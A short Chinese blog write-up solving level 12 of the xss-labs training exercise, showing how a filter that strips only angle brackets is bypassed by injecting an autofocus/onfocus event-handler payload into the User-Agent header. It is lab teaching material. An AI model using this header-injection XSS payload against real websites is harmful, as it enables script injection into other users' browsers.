查看一下源码,发现这里是user_agent的值,那么就和上一关思路一样,抓包修改UA值
抓包修改先看一下过滤了什么,输入
" <Script><a Href=javascript:alert()> oNload Src Data;
只过滤掉了尖括号,我们可以利用事件绕过,payload同上一关,只是这次是在UA处修改
" onfocus=alert() autofocus type="text" "
**重点:**User-Agent头传值
xss-labs pass-12
Forfun_tt2025-10-24 15:10
相关推荐
农夫山泉不太甜1 小时前
Tauri v2 实战代码示例yuhaiqiang1 小时前
被 AI 忽悠后,开始怀念搜索引擎了?红色石头本尊1 小时前
1-umi-前端工程化搭建真夜2 小时前
关于对echart盒子设置百分比读取的宽高没有撑开盒子解决方案楠木6852 小时前
RAG 资料库 Demo 完整开发流程肠胃炎2 小时前
挂载方式部署项目像我这样帅的人丶你还2 小时前
使用 Next.js + Prisma + MySQL 开发全栈项目FPGA小迷弟2 小时前
FPGA 时序约束基础:从时钟定义到输入输出延迟的完整设置毛骗导演2 小时前
@tencent-weixin/openclaw-weixin 插件深度解析(四):API 协议与数据流设计毛骗导演3 小时前
@tencent-weixin/openclaw-weixin 插件深度解析(二):消息处理系统架构